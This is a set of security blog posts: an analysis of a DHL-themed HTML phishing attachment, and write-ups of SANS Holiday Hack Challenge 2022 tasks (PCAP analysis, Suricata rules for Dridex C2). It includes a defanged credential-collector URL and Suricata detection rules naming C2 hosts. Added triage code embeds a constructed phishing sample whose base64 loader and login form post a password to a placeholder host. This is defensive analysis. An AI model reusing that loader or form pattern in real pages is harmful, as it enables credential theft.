Tuesday, February 28, 2023

Phishing email from "DHL"


*** DON'T TRY THIS AT HOME/WORK ***

Today I got a wonderful phishing email: the attacker sent me a DHL bill for an account I don't have, so that's the first red flag. Then the attachment was an HTML file instead of the PDF stated in the email.




So I decided to take a look...


I downloaded the attachment and took a peek from my WSL Linux console.



Very interesting:
 
The HAKWELOTANIYDEK variable contains my email address.
The Stivenkalvin variable has a base64 value that, decoded, becomes

hXXp://ocbpremium.org/app/loi1hn.php, so this website has probably been hacked and now hosts this PHP credential collector.

BTW, I tried putting HAKWELOTANIYDEK into Google Translate and the best match was a romanization of Arabic.



When trying that URL we get redirected to office.com, probably because we aren't passing the right parameters to the PHP script; this makes people think it is a legit website.

With curl -L we can follow any redirects; HTTP code 302 indicates a redirection, and the Location header tells us where we are going.




Now we have the rest of the base64 encoded JavaScript:




The atob() method decodes base64 to ASCII, and document.write() populates the DOM document with the result, loading all the code into the browser.

If we decode the base64 text we get HTML content with JavaScript that imitates a Microsoft login page, prepopulates the username with the value in HAKWELOTANIYDEK, and even turns off autocomplete. No matter what you type for the password it will always return "wrong password" and send the information to their server.




It also keeps replacing the URL in the browser's address bar with office.com, using atob("aHR0cHM6Ly9vdXRsb29rLm9mZmljZS5jb20vbWFpbC8").
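As an added example (not code from the original post), here is a small Python triage script that does what we just did by hand: it pulls the base64 literals out of an HTML attachment, decodes them the way atob() does (tolerating missing padding), and flags the phishing-kit traits described above: the document.write(atob(...)) loader, a hardcoded victim address, a hidden password form posting to a PHP collector, and the base64 office.com URL. The attachment it runs on is a constructed sample with a placeholder host, not the real one.

```python
import base64
import re

# Constructed sample mimicking the attachment layout described above (placeholder host, not the real kit).
INNER_HTML = (
    '<form action="hXXp://phish.invalid/collect.php" method="post">'
    '<input name="login" value="victim@example.com" autocomplete="off">'
    '<input name="passwd" type="password" autocomplete="off"></form>'
)
SAMPLE_ATTACHMENT = (
    '<script>var HAKWELOTANIYDEK="victim@example.com";'
    'var Stivenkalvin="' + base64.b64encode(INNER_HTML.encode()).decode() + '";'
    'document.write(atob(Stivenkalvin));'
    'history.replaceState({}, "", atob("aHR0cHM6Ly9vdXRsb29rLm9mZmljZS5jb20vbWFpbC8"));'
    '</script>'
)

VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([A-Za-z0-9+/=]{16,})"')  # base64-looking var values
ATOB_RE = re.compile(r'atob\(\s*"([A-Za-z0-9+/=]+)"\s*\)')          # base64 literals fed to atob()
EMAIL_VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"[^"@\s]+@[^"\s]+"')  # hardcoded victim address

def decode_b64(val):  # decode like atob(): tolerate missing '=' padding, never raise on junk
    val += "=" * (-len(val) % 4)
    try:
        return base64.b64decode(val, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""

def decode_blobs(html):  # map every base64 literal (var assignment or atob() argument) to its text
    blobs = {name: decode_b64(val) for name, val in VAR_RE.findall(html)}
    for i, val in enumerate(ATOB_RE.findall(html)):
        blobs[f"atob#{i}"] = decode_b64(val)
    return blobs

def triage(html):  # return the phishing-kit indicators found in an HTML attachment
    findings = []
    if "document.write(atob(" in html.replace(" ", ""):
        findings.append("loader: document.write(atob(...)) injects decoded HTML")
    for m in EMAIL_VAR_RE.finditer(html):
        findings.append(f"{m.group(1)}: victim e-mail hardcoded (prefilled login)")
    for name, text in decode_blobs(html).items():
        if 'type="password"' in text:
            findings.append(f"{name}: decoded blob contains a password form")
        if 'autocomplete="off"' in text:
            findings.append(f"{name}: autocomplete disabled on login fields")
        for url in re.findall(r'action="([^"]+)"', text):
            findings.append(f"{name}: credentials posted to {url}")
        if text.startswith(("http://", "https://")):
            findings.append(f"{name}: hidden URL {text} (address-bar/redirect trick)")
    return findings
```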







QUICK UPDATE: hXXp://ocbpremium.org/ is a fake website.


The DNS is hosted by NameCheap 🚩🚩🚩🚩



Tuesday, January 10, 2023

SANS Holiday Hack Challenge 2022 - Tolkien Ring

The Tolkien Ring


As we walk into the Tolkien Ring area we find our old friend Sparkle Redberry, and like always, he needs our help.




We download the PCAP through the link he provides and we enter the terminal to find more instructions.



First question



We open the PCAP with Wireshark and go to the menu File --> Export Objects and choose HTTP... (that's the answer, HTTP).
We immediately see the files downloaded; this also gives us the answer to the next question.

HTTP Objects Downloaded
Using the screenshot above we can answer question 2.



and 3



Now for question 4 we have to go a bit deeper and follow one of the HTTP streams to see that the response HTTP headers say Server: Apache.


And there we can see the IP address to answer the question



Now for question five, we can save the app.php file to our computer from the Wireshark File menu using the same Export Objects option as above.

To look at the last few lines of the file we use the tail command, and we can see there's a blob being saved as Ref_Sept21-2020.zip; this is the answer.





For question 6 things get a bit more complicated: we need to find the TLS certificates exchanged in the traffic, and to do that we run binwalk on the PCAP.


There are a lot of certificates in the file, so we need to extract them to examine them.

To examine the extracted files we can use find with -exec to run openssl on each one and make sure they are certificates in DER format:


find . -type f -exec openssl x509 -inform der -in {} -noout -text \; 2>/dev/null | grep Issuer



This gives us all the Issuers of the certificates found including the Country (C), State (ST), City/Location (L).

We can see 3 main countries:
C = IL for Israel
C = SS for South Sudan
C = US for United States

And we enter those as our answer, completing our first objective to find the Tolkien Ring.
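As an added example (not part of the original write-up), the Python below does by hand what the openssl one-liner does for the Issuer line: it walks the DER structure of a certificate just far enough to read the issuer's countryName (OID 2.5.4.6) and tallies the countries over a batch of carved files, with no third-party module. No real certificates are embedded; sample_cert() builds a constructed skeleton whose leading tbsCertificate fields are laid out like X.509, which is all the parser reads.

```python
from collections import Counter

# Minimal DER walker (stdlib only) that reads the issuer countryName, the C= openssl prints, from a DER cert.
OID_COUNTRY = b"\x55\x04\x06"   # OBJECT IDENTIFIER 2.5.4.6 (countryName)

def tlv(data, pos):
    """Parse one DER tag-length-value at pos -> (tag, value, end); ValueError if malformed."""
    if pos + 2 > len(data): raise ValueError("truncated")
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                    # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        if not 0 < n <= 4: raise ValueError("bad length")
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    if pos + length > len(data): raise ValueError("truncated")
    return tag, data[pos:pos + length], pos + length

def children(value):   # yield (tag, value) for every element of a constructed DER value
    pos = 0
    while pos < len(value):
        tag, v, pos = tlv(value, pos)
        yield tag, v

def issuer_country(cert):
    """Return the issuer C= of a DER certificate (None if absent); ValueError if not cert-shaped."""
    tag, body, _ = tlv(cert, 0)
    tbs_tag, tbs = next(children(body), (0, b""))          # tbsCertificate is the first element
    fields = list(children(tbs)) if tag == tbs_tag == 0x30 else []
    if fields and fields[0][0] == 0xA0: fields.pop(0)      # optional [0] EXPLICIT version
    if [t for t, _ in fields[:3]] != [0x02, 0x30, 0x30]:   # serialNumber, signature, issuer
        raise ValueError("not a certificate")
    for _, rdn in children(fields[2][1]):                  # Name ::= SEQUENCE OF SET OF SEQUENCE
        for _, attr in children(rdn):
            (ot, oid), (_, val) = list(children(attr))[:2]
            if ot == 0x06 and oid == OID_COUNTRY: return val.decode("ascii")
    return None

def issuer_countries(certs):   # tally issuer countries over a batch of carved certs
    return Counter(issuer_country(c) for c in certs)

def der(tag, content):   # encode one TLV; used only to build the constructed sample below
    if len(content) < 128: return bytes([tag, len(content)]) + content
    lb = len(content).to_bytes((len(content).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def sample_cert(country):
    """Constructed skeleton (not a valid cert): only the leading tbsCertificate fields are X.509-shaped."""
    name = der(0x30, der(0x31, der(0x30, der(0x06, OID_COUNTRY) + der(0x13, country))))
    alg = der(0x30, der(0x06, bytes.fromhex("2a864886f70d01010b")))   # sha256WithRSAEncryption
    pad = der(0x04, b"\x00" * 200)    # filler so the outer length uses the long form, as real certs do
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01") + alg + name + pad)
    return der(0x30, tbs + alg + der(0x03, b"\x00" * 4))
```

Run issuer_countries() over the bytes of the files binwalk extracted to get the same country breakdown as the grep above, without openssl.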


As we walk to the right in the same room we find Fitzy Shortstack and, of course, he has a problem to solve.



We enter the terminal and find that we've been tasked with creating Suricata rules to alert on further communication with the Command and Control we discovered before.



Following the syntax, we come up with a rule for the first alert:

alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk"; nocase; sid:20221211;rev:1;)

We always change the sid to avoid conflicts with other rules.


We check our rule and get our next task.



This one is a bit trickier; we need 2 rules to catch both ways of communication, or at least, with the little knowledge I have of Suricata, this is the way I found that worked fine.


alert http any any -> 192.185.57.242 any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2022121122;rev:1;)
alert http 192.185.57.242 any -> any any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2022121123;rev:1;)




We verify again, and get our new task: to identify bad certificates in the traffic.


To accomplish this, we need Suricata to examine the certificate used in the TLS handshake by checking the CommonName (CN) in it:

alert tls any any -> any any (msg:"Investigate bad certificates, possible Dridex infection";tls.cert_subject; content:"CN=heardbellith.Icanwepeh.nagoya";sid:202212114;rev:1;)


Once again, we verify our new rule and get one more task.


We can find the malicious JavaScript by checking the body of the HTTP response for the string we're looking for:

alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; flow:to_client;http.response_body;content:"let byteCharacters = atob";sid:5;)

And that's it! 
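As an added example (not from the challenge or the original post), here is a small Python linter for rules in the syntax used above; it uses a simplified parser, not Suricata's, and catches the mistakes that bite when writing rules by hand: a missing msg, sid or rev, two rules sharing a sid, and a content match with no sticky buffer. The rule set is the one written above plus one constructed rule that deliberately reuses sid 5.

```python
import re

# Constructed rule set: the rules written above plus one extra rule that deliberately
# reuses sid 5, so the duplicate-sid check has something to catch.
RULES = """\
alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk"; nocase; sid:20221211;rev:1;)
alert http any any -> 192.185.57.242 any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2022121122;rev:1;)
alert http 192.185.57.242 any -> any any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2022121123;rev:1;)
alert tls any any -> any any (msg:"Investigate bad certificates, possible Dridex infection";tls.cert_subject; content:"CN=heardbellith.Icanwepeh.nagoya";sid:202212114;rev:1;)
alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; flow:to_client;http.response_body;content:"let byteCharacters = atob";sid:5;)
alert http any any -> any any (msg:"Constructed duplicate"; flow:to_client; http.response_body; content:"document.write(atob"; sid:5; rev:1;)
"""

HEADER_RE = re.compile(r'^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s+\((.*)\)\s*$')
OPT_RE = re.compile(r'([\w.\-]+)\s*(?::\s*("[^"]*"|[^;]*))?\s*;')   # keyword[:value]; quotes kept intact
STICKY_BUFFERS = {"dns.query", "tls.cert_subject", "tls.sni", "http.uri", "http.host", "http.response_body"}

def parse_rule(line):
    """Split one rule into header fields plus an ordered (keyword, value) option list."""
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable rule: {line[:40]!r}")
    action, proto, src, sport, direction, dst, dport, opts = m.groups()
    options = [(k, v.strip('"')) for k, v in OPT_RE.findall(opts)]
    return dict(action=action, proto=proto, src=src, sport=sport, direction=direction,
                dst=dst, dport=dport, options=options)

def lint(rules_text):
    """Report missing msg/sid/rev, sid collisions, and content matches with no sticky buffer."""
    problems, seen = [], {}
    lines = [l for l in rules_text.splitlines() if l.strip() and not l.lstrip().startswith("#")]
    for n, line in enumerate(lines, 1):
        rule = parse_rule(line)
        kws = [k for k, _ in rule["options"]]
        sid = dict(rule["options"]).get("sid")
        for required in ("msg", "sid", "rev"):
            if required not in kws:
                problems.append(f"rule {n}: missing {required}")
        if sid in seen:
            problems.append(f"rule {n}: sid {sid} already used by rule {seen[sid]}")
        if sid is not None: seen.setdefault(sid, n)
        if "content" in kws and rule["proto"] in {"dns", "http", "tls"} and not STICKY_BUFFERS & set(kws):
            problems.append(f"rule {n}: content matches the raw payload; use a {rule['proto']}.* buffer")
    return problems
```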

Now we can walk to the end of the hall and find Snowrog (any similarity to a Balrog is pure coincidence).





And here's the long lost Tolkien Ring.







SANS Holiday Hack Challenge 2022 - Introduction

Once again Santa has invited us to his cyber security conference, KringleCon at the North Pole, and once again... something weird is going on.

Santa has lost his 5 rings of power (he's definitely a lord of some rings 😉), and it seems that without these rings the holidays will be ruined for all those kids that get gifts from him for some reason 🤷

When you get to the North Pole you are given a cryptocurrency wallet while interacting with the teller machine; it seems all the businesses at the North Pole have been persuaded to use KringleCoin, so we're going to need it as we go, and we should try to collect some coins along the way.

This is the KringleCoin Wallet
Feel free to donate if you figure out how
:D



The first Cranberry Pi terminal we encounter is a pretty simple one, just to give us a sense of how things work, so we do as it says and get that out of the way.






As we walk we find holes in the floor, like those homes from that epic story about small beings with big hairy feet.


So we go down the cave to find a door that says Tolkien Ring; this is our first real challenge, but next to it is our new friend Grinchum.

Grinchum
😒Who took you, Precious? How did they take you? Mustn't happen again.
🙂 Oh, hello, humanses. Maybe we can offer help?
😏 Yes... Grinchum will help the humanses.
We are trying to distract them from finding the rest of you, Preciouses, with talk of hints and coinses.
🙂 Have you found the coffers yet? The ones at the end of hidden paths?
😏 There's hintses in them, and coinses, they're veeerrryy special.
🙂 Just look hard, for little, bitty, speckles or other oddities.
Don't worry, they will not look for you, Preciouses. Shhh...
🙂 Go on, humanses. Start searching!